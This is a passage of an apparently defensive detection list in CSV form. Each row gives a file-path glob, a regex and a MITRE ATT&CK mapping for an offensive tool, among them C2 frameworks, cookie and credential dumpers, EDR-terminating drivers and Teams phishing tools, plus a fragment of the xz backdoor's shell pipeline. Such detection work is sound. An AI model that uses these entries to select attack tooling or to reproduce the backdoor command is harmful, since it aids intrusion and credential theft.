"*/Talon/*Agent/Source*",".{0,1000}\/Talon\/.{0,1000}Agent\/Source.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/target:exe spacerunner.cs*",".{0,1000}\/target\:exe\sspacerunner\.cs.{0,1000}","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","184","39","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" "*/targetedKerberoast*",".{0,1000}\/targetedKerberoast.{0,1000}","offensive_tool_keyword","targetedKerberoast","Kerberoast with ACL abuse capabilities","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/ShutdownRepo/targetedKerberoast","1","1","N/A","N/A","3","286","43","2024-02-20T10:08:29Z","2021-08-02T20:19:35Z" "*/targetedKerberoast.py*",".{0,1000}\/targetedKerberoast\.py.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","1","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*/targets-asn.nse*",".{0,1000}\/targets\-asn\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-map4to6.nse*",".{0,1000}\/targets\-ipv6\-map4to6\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-echo.nse*",".{0,1000}\/targets\-ipv6\-multicast\-echo\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-invalid-dst.nse*",".{0,1000}\/targets\-ipv6\-multicast\-invalid\-dst\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-mld.nse*",".{0,1000}\/targets\-ipv6\-multicast\-mld\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-multicast-slaac.nse*",".{0,1000}\/targets\-ipv6\-multicast\-slaac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-ipv6-wordlist.nse*",".{0,1000}\/targets\-ipv6\-wordlist\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-sniffer.nse*",".{0,1000}\/targets\-sniffer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-traceroute.nse*",".{0,1000}\/targets\-traceroute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/targets-xml.nse*",".{0,1000}\/targets\-xml\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/TartarusGate.git*",".{0,1000}\/TartarusGate\.git.{0,1000}","offensive_tool_keyword","TartarusGate","TartarusGate Bypassing EDRs","T1055 - T1218.011 - T1027.009 - T1027 - T1105 - T1102.001","TA0005 - TA0001 - TA0002 - TA0009","N/A","N/A","Defense Evasion","https://github.com/trickster0/TartarusGate","1","1","N/A","10","5","448","59","2022-01-25T20:54:28Z","2021-11-27T19:46:30Z" "*/Tash.dll*",".{0,1000}\/Tash\.dll.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashClient.*",".{0,1000}\/TashClient\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/TashLoader.*",".{0,1000}\/TashLoader\..{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/Tater.ps1*",".{0,1000}\/Tater\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "*/tccbypass.md*",".{0,1000}\/tccbypass\.md.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/TChopper.git*",".{0,1000}\/TChopper\.git.{0,1000}","offensive_tool_keyword","Tchopper","conduct Lateral Movement attack by leveraging unfiltered services display name to smuggle binaries as chunks into the target machine","T1021 - T1564","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/lawrenceamer/Tchopper","1","1","N/A","9","1","49","7","2021-06-14T08:27:31Z","2021-06-08T15:51:14Z" "*/TCPMITM.py*",".{0,1000}\/TCPMITM\.py.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","1","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*/tcpshell.py*",".{0,1000}\/tcpshell\.py.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","1","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*/TeamFiltration.dll*",".{0,1000}\/TeamFiltration\.dll.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/TeamFiltration.exe*",".{0,1000}\/TeamFiltration\.exe.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/TeamFiltration/releases/latest*",".{0,1000}\/TeamFiltration\/releases\/latest.{0,1000}","offensive_tool_keyword","TeamFiltration","TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","T1110 - T1087 - T1560.001 - T1592 - T1071","TA0001 - TA0003 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Flangvik/TeamFiltration","1","1","N/A","10","10","965","105","2023-11-08T17:41:59Z","2022-06-28T00:00:28Z" "*/Teamphisher.txt*",".{0,1000}\/Teamphisher\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*/Teamphisher/targets.txt*",".{0,1000}\/Teamphisher\/targets\.txt.{0,1000}","offensive_tool_keyword","teamsphisher","Send phishing messages and attachments to Microsoft Teams users","T1566.001 - T1566.002 - T1204.001","TA0001 - TA0005","N/A","N/A","phishing","https://github.com/Octoberfest7/TeamsPhisher","1","1","N/A","N/A","10","969","127","2024-04-23T14:52:03Z","2023-07-03T02:19:47Z" "*/teams_cookies_output.json*",".{0,1000}\/teams_cookies_output\.json.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","0","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.git*",".{0,1000}\/teams_dump\.git.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1555 - T1003 - T1114","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","9","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_dump.py*",".{0,1000}\/teams_dump\.py.{0,1000}","offensive_tool_keyword","teams_dump","PoC for dumping and decrypting cookies in the latest version of Microsoft Teams","T1560.001 - T1555.003 - T1113 - T1557","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/byinarie/teams_dump","1","1","N/A","7","2","121","19","2023-11-12T18:47:55Z","2023-09-18T18:33:32Z" "*/teams_localdb.py*",".{0,1000}\/teams_localdb\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/teamserver-linux.tar.gz*",".{0,1000}\/teamserver\-linux\.tar\.gz.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamserver-win.zip*",".{0,1000}\/teamserver\-win\.zip.{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","339","47","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "*/teamspeak2-version.nse*",".{0,1000}\/teamspeak2\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/teamstracker.db*",".{0,1000}\/teamstracker\.db.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/teamstracker.git*",".{0,1000}\/teamstracker\.git.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/teamstracker.py*",".{0,1000}\/teamstracker\.py.{0,1000}","offensive_tool_keyword","teamstracker","using graph proxy to monitor teams user presence","T1552.007 - T1052.001 - T1602","TA0003 - TA0005 - TA0007","N/A","N/A","Reconnaissance","https://github.com/nyxgeek/teamstracker","1","1","N/A","3","1","49","4","2023-08-25T15:07:14Z","2023-08-15T03:41:46Z" "*/TelegramRAT.git*",".{0,1000}\/TelegramRAT\.git.{0,1000}","offensive_tool_keyword","TelegramRAT","Cross Platform Telegram based RAT that communicates via telegram to evade network restrictions","T1071.001 - T1105 - T1027","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/machine1337/TelegramRAT","1","1","N/A","10","10","295","48","2024-01-23T12:05:59Z","2023-06-30T10:59:55Z" "*/telnet_cdata_ftth_backdoor_userpass.txt*",".{0,1000}\/telnet_cdata_ftth_backdoor_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/telnet-brute.nse*",".{0,1000}\/telnet\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-encryption.nse*",".{0,1000}\/telnet\-encryption\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/telnet-ntlm-info.nse*",".{0,1000}\/telnet\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/terminate/Terminator.sys*",".{0,1000}\/terminate\/Terminator\.sys.{0,1000}","offensive_tool_keyword","SharpTerminator","Terminate AV/EDR Processes using kernel driver","T1055.003 - T1547.001 - T1053.005 - T1091 - T1014 - T1053.006 - T1053.004 - T1112 - T1112.001","TA0007 - TA0008 - TA0006 - TA0002","N/A","N/A","Exploitation tools","https://github.com/mertdas/SharpTerminator","1","1","N/A","N/A","3","289","59","2023-06-12T00:38:54Z","2023-06-11T06:35:51Z" "*/test_privesc.py*",".{0,1000}\/test_privesc\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","1","N/A","6","10","N/A","N/A","N/A","N/A" "*/test32.dll*",".{0,1000}\/test32\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/test64.dll*",".{0,1000}\/test64\.dll.{0,1000}","offensive_tool_keyword","cobaltstrike","Manual Map DLL injection implemented with Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/tomcarver16/BOF-DLL-Inject","1","1","N/A","10","10","144","22","2020-09-03T23:24:31Z","2020-09-03T23:04:30Z" "*/tests/files/good-large_compressed.lzma|eval $i|tail -c +31265|*",".{0,1000}\/tests\/files\/good\-large_compressed\.lzma\|eval\s\$i\|tail\s\-c\s\+31265\|.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise - rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://www.openwall.com/lists/oss-security/2024/03/29/4","1","0","rule author: @cyb3rops - link: https://github.com/Neo23x0/signature-base/blob/07daba7eb7bc44e6f73e199c6b9892241ab1b3d7/yara/bkdr_xz_util_cve_2024_3094.yar#L2","10","10","N/A","N/A","N/A","N/A" "*/tests/NIST_CAVS/*.rsp*",".{0,1000}\/tests\/NIST_CAVS\/.{0,1000}\.rsp.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*/tests/test-bof.ps1*",".{0,1000}\/tests\/test\-bof\.ps1.{0,1000}","offensive_tool_keyword","cobaltstrike","A tool to run object files mainly beacon object files (BOF) in .Net.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/nettitude/RunOF","1","1","N/A","10","10","135","19","2023-01-06T15:30:05Z","2022-02-21T13:53:39Z" "*/tevora-threat/PowerView*",".{0,1000}\/tevora\-threat\/PowerView.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script menu for 